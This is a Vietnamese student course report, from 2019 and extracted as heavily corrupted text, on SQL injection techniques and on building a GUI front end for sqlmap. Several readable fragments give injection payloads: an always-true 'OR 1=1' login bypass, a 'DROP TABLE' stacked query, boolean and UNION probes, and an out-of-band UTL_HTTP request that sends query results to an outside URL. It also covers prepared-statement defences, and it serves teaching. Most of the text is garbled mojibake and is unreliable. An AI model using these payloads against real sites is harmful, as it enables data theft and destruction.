20102035 - lê văn quân - báo cáo Đồ Án môn học - tấn công website bằng mysql...

7/26/2019 20102035 - L Vn Qun - Bo Co n Mn Hc - Tn Cng Website Bng Mysql Injection

1/20

TRNG I HC BCH KHOA H NIVIN CNG NGH THNG TIN V TRUYN THNG

*

N MN HCNGNH CNG NGH THNG TIN

TM HIU SQL INJECTION V VITCNG C TN CNG WEBSITE D

T!"N SQLM#

Sin !i"n #$% i&n' L$ V%& Q'(&() CNTT+TT,-, . K/0

Gi12 !i"n 3)n4 56n' T7 B)* T+,&- T)&-

H NI ,,89:,/

Sin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,


2/20

(I N@I UT2 12 %12 %DE Fi#E# S%>i# ni# !a 2 # M7i# 9:,/N #bn4 #in

%DE \1% en4-Nan l>n #] M7i#- Tm #3kn4 #3[n4 Q# & #Zn4 n4?nen4 ] ni^ n4 neJ E%\ % #_ e nn4 4op HE Q# & #Zn4 #"n mEX3[% Xia> \i_n cn4 M7i# e % n4 neJ i&> En nin #"n # 4i)i % X3[%X 2p

V S=( Ind%#i2n e 4op S=( Ind%#i2n 2h# XQn4 n3 # ne2p (e # ne2X_ fn4 #1n X3[% np

Tei i&> 7E> X? %>n4 %P %1% #bn4 #in !a X]n n4qEJ %1% 3rn4 1 #Pn%bn4 cn4 S=( Ind%#i2nJ %1% #% s? 5$n4 %bn4 %t #Pn %bn4 S=( Ind%#i2n l>E7lE AuI X_ 4iv nn4 n43wi l>n #] M7i# % #_ #$ \i_ #E & #Zn4M7i# %DE on % ] ni^ S=( Ind%#i2n \bn4 !e %1% 5!2 % #_ #1nnn4 n4 X n4E #x \i y# Xz> 1# #i_n 5$ 1n-



3/20

{|C (|CCH}NG I' T~NG =UAN V S=( INCTION--------------------------------------------------

,-,- ]n n4qE !e Q# !ei ! 5t-------------------------------------------------------------------------,-9- C1% \ #># #Pn %bn4 S=( Ind%#i2n------------------------------------------------------------/

,-9-,- 22En8E75 in5---------------------------------------------------------------------------/

,-9-9- #i8E75 in5---------------------------------------------------------------------------------0,-9-;- 28E75-----------------------------------------------------------------------------------------0,-9-- UNION l>8E75--------------------------------------------------------------------------,-9-/- 7#E%\5 l>i7-----------------------------------------------------------------------------------,-9-0- 2>#828En5-----------------------------------------------------------------------------------------

,-;- C1% fn4 !&----------------------------------------------------------------------------------------------CH}NG II' Y NG CNG C| TN CNG FBSIT THNG =UAS=( INCTION------------------------------------------------------------------------------------------------------

9-,- Gi)i #i&> S=(E-----------------------------------------------------------------------------------------9-,-,- {Q# !ei %1% 7m 5tn4 S=(E #3wn4 4---------------------------------------------9-,-9- C1% #% 7lE l># 27 !E %EM M7i#---------------------------------------

9-9- 1% #$% #2n4 n4 5tn4 F------------------------------------------------------------------------9-9-,- ]n n4qE-----------------------------------------------------------------------------------------------9-9-9- {Q# !ei \ #># s1% #$% M7i#---------------------------------------------------------,:9-9-;- C1% 3rn4 #% s1% #$% #2n4 S=(E---------------------------------------------,:9-9-- C22\i7 !e 777i2n7-------------------------------------------------------------------------------,:

9-;- ? 5$n4 %3rn4 #on---------------------------------------------------------------------------------,9

9-;-,- u?n #% !e #i# \-------------------------------------------------------------------------------,99-;-;- H2en #i&n !e \i_ #m %3rn4 #on----------------------------------------------------,/9-;-- To i_> !e 72 71n E%\ 2s !e Mi# 2s-----------------------------------------,0

TRA CU BNG BIU-----------------------------------------------------------------------------------------,TI (IU THA{ KHO---------------------------------------------------------------------------------------,



4/20

CH./NG I0 T1NG QUN V2 SQL INJECTION

3434 5&6 &-678 9: ; ?@Sl Ind%#i2n e Q# n4 %2 n43wi 5>n4 % #_ %n !e #$% #i %?> &nS=( #bn4 l>E 5 i&> Xz> !e2 %DE F-

V 5t ,' S=( Ind%#i2n 5$E !e2 ,, >bn Xvn4Ki #o \i >7J 7! % #_ 7 #$% #i X2hn 7E>'

//Ly UserID t d liu u vo

txtUserId = getRequestString!UserId!"#

//$%& 'i(& xe& trong )*ng Users xe& +, user no +, UserID = txtUserID l gi- tr. n01votxtS2L = !S3L34$ 5 6R78 Users 9:3R3 UserId = ! ; txtUserId#

N> #E n U7I5 Q# 7Z #o 7 \bn4 % !Pn Xa 4o s E %J n3n4 n> #E nU7 I ,:/ 2 ,, #o %?> #> !Pn 7 #en'txtS2L = !S3L34$ 5 6R78 Users 9:3R3 UserId = or \i&n ,:/ 2 ,, 7 #k #en >bn Xvn4J !o ! E%\ % #_ #% s>P# 5 i&>#x S=( 5E#EE7 Q# %1% 5^ 5en4 n> Xia> \i&n Xz> !e2 \bn4 %# %-

V 5t 9' S=( Ind%#i2n 5$E !e2 >bn Xvn4-Ki s1% #$% #en !i"nJ 7! % #_ #$% #i X2hn 7E>'

uName = getRequestString("UserName");uPass = getRequestString("UserPass");

sql = "S ELECT * FROM Users !ERE Name =" # uName # " $N% Pass =" #

uPass # ""

HE%\ % #_ \2 2 %n 2 2% En5 !e2 #2n4 #3wn4 >NE !e >uE77 n37E>'SELECT * FROM Users !ERE Name ="" &r ""="" $N% Pass ="" &r ""=""

C?> #> !Pn #"n 2en #2en [ &J 7 #% #2en Q %1% #3wn4 #2n4 #E U77 En42ei !o AAAA '& F&-V> ?@ 0 SQL I&K=*& ?8 9: =6K 6*& &6*' K(' &6 FP&- =6*4Hz> # %1% 5E#EE77 Xa> #[ #$% #i nia> %?> &n S=( %1% nE> ki 5P>% V 5t'S! %25't'tUser = getRequestString("User");

t'tSL = "SELECT * FROM Users !ERE User = " # t'tUser;

Ki E%\ 5n4 in># U7I e'



5/20

,:/ ROu TAB( S>i7S! #o \i >7 % i5 e ,:/J 7E> X sE TE S>i7

34R4 CK =6'= =& K&- SQL I&K=*&S=( Ind%#i2n 4` 0 \ #># 7E> X?'

1.2.1. boolean-based blind

Gi 7m M7i# % in\ ##'MMM-sE-%2in5s-pi5,i_n #] 5 i&>N> #E #" AND1=2#en ##'MMM-sE-%2in5s-pi5,En5,9JM7i# n4xn4 i_n #] 5 i&>J 7E> X #m #E ,9 cn4 ,,J M7i# hi i_n #]5 i&>- Ki X M7i# X ] Q n4 B22En8E75 in5 S=( ind%#i2n in\5$E #"n Xvn4 7Ei

N4>"n n?n e 52 M7i# X \bn \2 n nn4 \# l> 7Ei %v 1 2% \bn4Xvn4J #> ni"n %?> #> !Pn %DE M7i# !6n 5^ 5en4 \Ei #1%

S(CT * RO{ >7 FHR i5i5Ki \bn4 i_n #] n3 !J #E % #_ #m cn4 %1% X21n zn 3[# #xn4 % %1i %DE#bn4 #in #E >Zn P cn4 %1% 5n4AN ASCIISUBSTRING>7nEJ,J,

SUBSTRING (expression, start, length) dng ly ! length ! t"#$t %& t' start a &serna*e+

S-II l. h.* h&yn ! t" / sang *0 S-II 12 tra 3& d14i 5y

6"a 7.o 8h h9n tr:n, ta / th i* tra h; 8i %& ti:n a&serna*e / ph nhanh h/ng h?n, / th th@ 74i A

http://www.example.com/index.php?id=1http://www.example.com/index.php?id=1%27and%271=2http://www.example.com/index.php?id=1http://www.example.com/index.php?id=1%27and%271=2


6/20

?*ng @A ?*ng trB +Cu & ES4IIF dGng H ly tng tin t dBtB)Bse

1.2.2. time-based blindT3rn4 #$ %1% #Pn %bn4 5$E #"n B22En8E75 in5J %g \1% %vn4 #E 7 7m 5tn4

n> Xia> \i&n Xvn4 #o 1 %D 7 5E E2 ?> cn4 %1% 7m 5tn4BNCH{ARK/::::::JNCO{SGJ / 7%2n57

1.2.3. error-based( n4 ne 5^ nn i# !e 5^ #Pn %bn4 nP#J ! 5t #> !Pn eS(CT * RO{ U7 FHR i5i5

N> #E #>an i5 % 4i1 #] 3XY %?> #> !Pn 7 ] 7Ei %v 1 !e i_n #] \# l> En42ei 4iE2 5i&n M-



7/20

:%n JA 9e)site Bngelvestgrou1K+o& ). l Mng sql errorN)BsedKHE%\ % #_ 5^ 5en4 #% s>P# 5 i&> #2n4 5E#EE7 5$E #"n n4 ne-

1.2.4. UNION query-basedGi 7m M7i# En4!7#42> #"n ] y% n4 UNION l>8E75JCaer / th hDo lDo h9n oEn *0 sa&F&nion all selet na*e ro* syso#Hets here xtypeJK&K

!e2 %>Zi in\ !e % #_ P X3[% nE #2n4 n4 772d%#7 e % s#>

1.2.. sta!"ed queries? e %1% E%\ 5$E !e2 %?> &n \ #2n4 S=(V 5t 7l l>i7 eS(CT * RO{ U7 FHR i5i5TE % #_ %n i5 ,ROu TAB( U7J \i X #> !Pn 7 eS(CT * RO{ U7 FHR i5, ROu TAB( U7S sE n4E #E U7 7E> \i #> !Pn Xn i5,-HE%\ % #_ 5^ 5en4 #> !Pn 5 i&> Xn 5E#EE7J #E Xi #bn4 #in #"n5E#EE7 n3 >7nEJ E77M25J

V)i i neJ E5in % #_ e 4o !)i 5E#EE7 #o E%\ %jn4 % #_ e X3[% n3!-

1.2.#. out-o$-bandT1?ng t" stad Lerries, nh1ng l%n n.y haer / th tn =ng ddos 8e#site h8 #Mng

||UTL_HTTP.request('(URL)/'||(SELECT user !"# $UL&&

344 CK6 Z6[&- 9{Q# 7Z M 5!27 7m 5tn4 %1% %n %1% #x \E #2n4 S=( In># X_ #1n ]

#Pn %bn4 S=( Ind%#i2n- T> ni"n %1% ne 7in E nia> P# #i&n- C1% #Z# nP# e7m 5tn4 SQL #8+8;=+\4V 5tt'tNam = getRequestString("Cust&merName");

t't$ = getRequestString("$ress");

t'tCit = getRequestString("Cit+");

t'tSL = "NSERT NTO Cust&mers (Cust&merName,$ress,Cit+)

-alues(./,.0,.1)";

23E'e4ute(t'tSL,t'tNam,t't$,t'tCit);



8/20

(&n 5-s%># 7 %n %1% EE#7 !e2 %?> &n 7l !e #1n !i&% %n nn4in># %E 1% -



9/20

CH./NG II0 ]^_ DNG CNG C TN CNG WEBSITE THNGQU SQL INJECTION

R434 G*`* =6*' SQL;8ZS=(E e %bn4 %t l># n4 2 # 5E#EE7 !e #$ XQn4 l># 7l ind%#i2n-S=(E X3[% !i# cn4 #2nJ %h n X]n #"n nan #2n9-0 !e #2n9-

2.1.1. %&t '(i !)!* s+ d,n /0ma t*n

S=(E e %bn4 %t l># n4 2 # 5E#EE7 !e #$ XQn4 l># 7l ind%#i2n-S=(E X3[% !i# cn4 #2nJ %h n X]n #"n nan #2n9-0 !e #2n9-{Q# !ei %1% 5>n4 %DE 7lE 7E> X?'O#i2n8J 88 Hi_n #] 3)n4 56n

8 Hi_n #] 3)n4 56n Xz XD88!7i2n Hi_n #] i"n n8! VRBOS Hi_n #] %i #i#TE4#85 IRCT K# nZi #$% #i Xn 5E#EE78> UR( K# nZi #)i UR(8 (OGI( u?n #% \# l> #x 24 i8 BU(KI( =># nia> t% #i"> X3[% 4i #2n4 i8 R=USTI( T$% i&n HTTu l>7# #x i84 GOOG(ORK (P \# l> #o \i #x 4224 !e l>#

zn 3[#8% CONIGI( (P 2#i2n #x i iniInd%#i2n8 CWn EE#7887\i B l>E EE# 88E#%88%EMs

Bn4 ' C1% 7m 5tn4 {7l Ind%#i2n

2.1.2. 5)!* t*6! sqlma qu7t $orms 'a !ra8l 8ebsite.

C1% #% 7lE l># 27Ki_ #E \# nZi #)i >To \i 2

N> \bn4 #o #P 2J \# #v% %3rn4 #onN> #o #P 2J X3E E %1% EE#7 %DE 2 XHi n43wi 5n4 % >Zn \i_ #E 2 ne \bn4 % X]n %Ki_ #E XQ n X]n %DE > 7E> \i 7n5 27#4#J > % 4i n4>"n E \bn4

N> U \bn4 n X]nJ 7l 7 72 71n !e 5$E !e2 7$ \1% nE> %DE > # !a X_ X3E E\# l>Ki_ #E EE# #2n4 23E E \# l> %DE EE# X



10/20

K# #v% EE#7K# #v% 273E E \# l>J \# #v% %3rn4 #on

Bn4 /' C1% #% 7lE l># 2

Ki_ #E % 7i#E E \bn4 % X]n \bn4N !e2 7Z >`n4 % X]n ,Ki_ #E > % 5i%# E \bn4J i n43wi 5n4 % >Zn #2 in\ ne E \bn4n$E !e2 XQ 5# %DE %EMJ P E 5En 71% in\ cn4 %1% P #xn4 in\ #2n4 i#En4J 3> hi in\ XJ 4mi ## l>7# !e nn ## 72n7J #i #t% P #2en Q in\#2n4 #En4 XJ % n3 ! Xn \i Xh# X3[% XQ 7?>

N> \bn4 % in\ #o \# #v% %3rn4 #onN> % in\J %3rn4 #on 7 W% E %1% in\ % %n4 %P> #v%J ! 5t

##'E5-2425>%#-pi5, !e ##'E5-24>5>%#-pi59 7%g X3[% #7# , zn-3E E in\ Xz> #i"nJ i n43wi 5n4 >Zn #7# \bn4 T7# n> X3[% "> %z>( hi %2 Xn \i # #2en Q in\3E E \# l>K# #v% %3rn4 #on

Bn4 0' C1% #% 7lE %EM M7i#

R4R4 ]K =6K =+&- a&- ?@&- Wb2.2.1. 9:n* n*;a1% #$% e Q# !i&% s1% X]n Q# >7 %n e n43wi X-Hi_> Xrn 4inJ \i #h2 , >7 e E%s !e % # \> ,9;/0- Ki s1% #$%JM7i# 7 i >7nE !e E77M25 e 4o- N43wi 5n4 7 n !e2 >7nE !e

E77M25 X #h2 #3)% XJ !e 1 %D 7 s1% nn X? %n e >7 e X #h2>7nE E%s-{t% X% %DE !i&% s1% #$% #"nJ e #1n nn4 n43wi \1% % #_ e nn4 !i&%e 1 %D D l>an >7nE E%s e !i&%- Vo !J 1 %D 7 %Z 4yn4

\bn4 X_ E%\ #> % X3[% >7 e \bn4 %zn # \> 2% 5^ 5en4 P X3[%# \>-

2.2.2. %&t '(i "< t*ut >)! t*?! 8ebsite HTTu BE7i% A>#n#i%E#i2n

HTTu i47# A>#n#i%E#i2n

HTTuS Cin# A>#n#i%E#i2n

2 BE75 A>#n#i%E#i2nSin !i"n #$% i&n' 9:,:9:;/ (" V?n K/0 () CNTT+TT,-,
http://myphamdep.org/product.php?id=1http://myphamdep.org/pruduct.php?id=2http://myphamdep.org/product.php?id=1http://myphamdep.org/pruduct.php?id=2


11/20

(r)*sertru+ ,-.*e/s0te

1e/ser2er3450 t6)sess0)7

1e/ser2er890 ,))30e

,4)/r)*ser

(r)*ser :;u,))30e

2.2.3. 5)! *@n t*6! >)! t*?! tron /0maSlE #[ ; 3rn4 #% s1% #$% ##


12/20

(r)*ser tru+ ,-.ser2er> 890 3?@ ,))30e

Ser2er 30A@ tr< ,))30e,B t;C78 D78 2E0

sess0)7 7F) 34G78H =Iu 34G78> 3450 t6) sess0)7

@E0H =Iu ,B> trJ 2K ,L, 80L trM N;O,

:;u tr)78 sess0)7 ,P

TrJ 2K tr


13/20

b) Giao di n

Hon ' GiE2 5i&n %3rn4 #on l># n4 7l ind%#i2n



14/20

c) Thi t k ch ng tr nh

Hon ,:' Sr X` \Zi %3rn4 #onC3rn4 #on 7 #h2 Q# 2 72M E %2 n43wi 5n4 nn4 # %Wn 7E> X?'

1 fut te) U!L C) - ur: C) ,r E X3[% %2En5 #2 %3rn4 #on X #on 7n !e 4Wi%2En5 Xn 7lE- SlE X3[% !i# cn4 #2n !e X3[% %h #"n nan #2n!o ! #E %zn % #2n !e 7lE #"n 1- SE> \i 7lE#2n %h s2n4%3rn4 #onJ n 7 # hi \# l> %2 %3rn4 #on !e %3rn4 #on 7 72M n "n2-

d) S d ng k thu t xc th c http

Cv 1 %DE 7lE !)i HTTu 2#2%2 E>#n#i%E#i2n eU7nE'E77M25V 5t #2n 7lE- 8> ##',9-,0-,;0-,;,7lE7lE7i%4#in#-pi5, 88E>#8# BE7i% 88E>#8%5 #7#>7'#7#E77

S #Pn %bn4 httpFOPQ+O+O+OOsLl*ap*ysLl#asigetint+phpVidJO !)i

3rn4 #% s1% #$% BE7i% !e >7nE #7#>7J # \> e #7#E77

http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1


15/20

e) S d ng cookie jk - ] tF )J

%znJ %Wn l>7# Xz> #i"n !e s

%22\i %DE n-

Hon ,,' =># cn4 %22\i X P

CP> #v% l># cn4 %22\i %DE 7lE e%2En5 .%22\inQi 5>n4 %22\iT$% n4i&

Hon ,9' S=(E l># \bn4 5n4 s1% #$%J M7! # !a 2 X


16/20

Hon ,;' SlE l># 7m 5tn4 %22\iJ # !a #En4 l>n #]

2.3.3. Eo(n t*iFn '( "iGm t*+ !*@n trHn*E {bi #3wn4 e !i&% e Fin52M7 ,: 0 i# % \# nZi hn4 #)i M7i# ] #Pn%bn4-

C>n ] nn4 %bn4 %t 7E> #3)% \i #on,- u#2n #"n Fin52M7J #i #hi ##7'MMM-#2n-249- SlEJ X3[% !i# cn4 #2nJ #i #hi' ##'7lE-24;- Vi7>E S#>5i2 5n4 X_ !i# n4 5tn4 #"n Fin52M7-

% C1% #% %3rn4 #on 2h# XQn4

https://www.python.org/http://sqlmap.org/https://www.python.org/http://sqlmap.org/


17/20

2.3.4. Hm *iGu '( so s)n* bla!" bo> '( 8*ite bo>

S2 71n BE%\ B2s Fi# B2s]n n4qE (e 3rn4 1 \i_ #E

XQ 2 # %DE zn a

n3 Q# Q Xn . n43wi\i_ #E \bn4 %zn i

i# !a 2h# XQn4 "n #2n4%DE n-

(e 3rn4 1 \i_ #EXQ 2 # %DE zn a

cn4 %1% l># #$% #i72>% %25-

BE%\ B2s !e Fi# B2s#2n4 F 5!2n#

(e 3rn4 1 \i_ #EXQ 2 # M7i# cn4%1% 4mi nn ##l>7#72n7J %Z #onX3E !e2 %1% in># 1%

nc X3E E n4 %DEM7i#-

N42ei E E%\ 2s %fn %#_ #$% #i l># n4%DE M 7!-

(e 3rn4 1 \i_ #E#$% #i 72>% %25J s1%X]n #> !Pn Xn 5E#EE7% 7r k E \bn4J \i_#E %1% i_n #] E n42ei %

5^ ] %n #" 7%i# E\bn4J !!-

> Xi_ $l cF tY, d mG ,[ It

s)ur,e ,)ce S9 ci t)): ,B tA

A@ tr< N;O,Ku *este mA@ tr< ] ,,

s9 ci ,n ,,


18/20

C1% #22 Fi# B2s X3[% 7m 5tn4 #3wn4 5n4 X_ l># %1% >ni# % #_ e Q# %E77JQ# i J J X3[% i_> e #en zn n nP# % #_ #7# #2n4 S2>% %25-_ l># cn4 Fi# B2sJ #7# i l>"n Xi !a u2d%# !e i #3 5> n3 Q#E%\- T2n4 %1% 5$ 1n X3[% !i# cn4 J %bn4 %t E X3[% 7m 5tn4 X_ #7# e

>ni# X3[% #i !a #hi'##7'>ni#-5

N42ei E %fn % >ni# %2 E!EJ N>ni# %2 2#n#--Fi#2s ni %>n4 !e >ni# ni i"n4J #3wn4 X3[% 7m 5tn4 %2 i##24Ein4 #3wn4 X3[% !i# #y# e u . e 3rn4 #% 1# #i_n zn anEn !e i&> l> nP# \i \1% en4 #E Xi "> %z>-=>1 #on 1# #i_n zn a 5$E #"n #7# #$ XQn4 !e i"n #t% 4Wi e T7# i!n!2n# T- T2n4 l>1 #on neJ #E !o %25 X3[% !i# #3)%J 5!277 !i# #7#in4 >ni# #3)% n3 Q# n #i# \ 7r \Ei %DE %3rn4 #onJ 7E> X )i!i# %25 X_ E77 %1% #7#in4 >ni# 7E>- C i zn %25 #E XiJ 5!7 % #_ 5^5en4 %h hi l>1 #on #7# !)i %1% #7# %E77 X X3[% \2 2 X3E !e2 v% #3)%J4i #wi 4iEn 1# #i_n zn a cn4 %1% >bn \i_ #E X3[% i-Zi !)i 2 # M7i# ni %>n4 !e 7l ind%#i2n ni i"n4J 5! % #_ %D XQn4X3E !e2 %1% in># 1% !e X]n n4qE # ne2 e En #2en %2 #7#in4 >ni# nc \i_#E n4 2 # #$ XQn4 !e % #_ l># i"n #t% #2n4 l>1 #on 5!-

https://phpunit.de/https://phpunit.de/https://phpunit.de/


19/20

T! CjU BkNG BIUBi_> X` ,' TZn4 \" %DE Fi#E# 7%>i# !a 2 # M7i# 9:,/--------------;Bn4 9' Bn4 #E %> ASCIIJ 5n4 X_ P #bn4 #in #x 5E#EE7-0Hon ;' F7i# En4!7#42>-%2 ] n4 7l 28E75---Bn4 ' C1% 7m 5tn4 {7l Ind%#i2n--

Bn4 /' C1% #% 7lE l># 2Bn4 0' C1% #% 7lE %EM M7i#------Hon ' GiE2 #i 4iE 7! !e %in# \i %3E % %22\i !e 777i2n-,,Hon ' GiE2 #i 4iE 7! !e %in# \i X % %22\i !e 777i2n-,,Hon ' GiE2 5i&n %3rn4 #on l># n4 7l ind%#i2n---,9Hon ,:' Sr X` \Zi %3rn4 #on----,;Hon ,,' =># cn4 %22\i X P-----,Hon ,9' S=(E l># \bn4 5n4 s1% #$%J M7! # !a 2 X


20/20

TI LIlU THM mHkO

,- S=(E >77 En>E' ##7'4i#>-%27lE2d%#7lEMi\i

9- RC90,0' ##'MMM-M;-24u2#2%27%90,0%90,0-#

;- S=( Ind%#i2n M;7%227-%2'##'MMM-M;7%227-%27l7lind%#i2n-E7

- S=( Ind%#i2n 2ME7-24' ##7'MMM-2ME7-24in5s-S=(Ind%#i2n

/- O># 2 En5 ##7'MMM-E%>n#is-%224E#i%7in582>#828En587l8ind%#i2n8!>nEii#8#7#in48E5558E%>2ni#2

0- B22En8E75##'7%>i#-7#E%\s%En4-%2l>7#i2n70,0:0>n57#En5in4822En8

E7587l8ind%#i2n

- Ti8E75 ##'MMM-7lind%#i2n-n##i8E75

- 28E75 ##'MMM-7lind%#i2nMi\i-%2CE#42i797l87l8ind%#i2n8%E#87#

- UNION l>8E75 ##'MMM-#2>n#-%29:,;:!#in482>8MEn#58#28\n2M8E2>#87l-#

,:-S#E%\5 =>i7 ##'MMM-M;7%227-%27l7lind%#i2n-E7

,,- F Ai%E#i2n S%Enn7 BE%\ B2s !7- Fi# B2s##7'MMM-2ME7-24iE470OFASuI(9::SEEEniBE%\B2sV7Fi#B2s-#

,9- F Ai%E#i2n S%>i#J #1% 4i TS- T]n T>Pn h#

,;-##'72i%#->7#-5>-!n5E###MdE!EBEi,FAS%>i#S%-5

,-S77i2n !e %22\i' ##'M;7%227-%2


20102035 - lê văn quân - báo cáo Đồ Án môn học - tấn công website bằng mysql...

Documents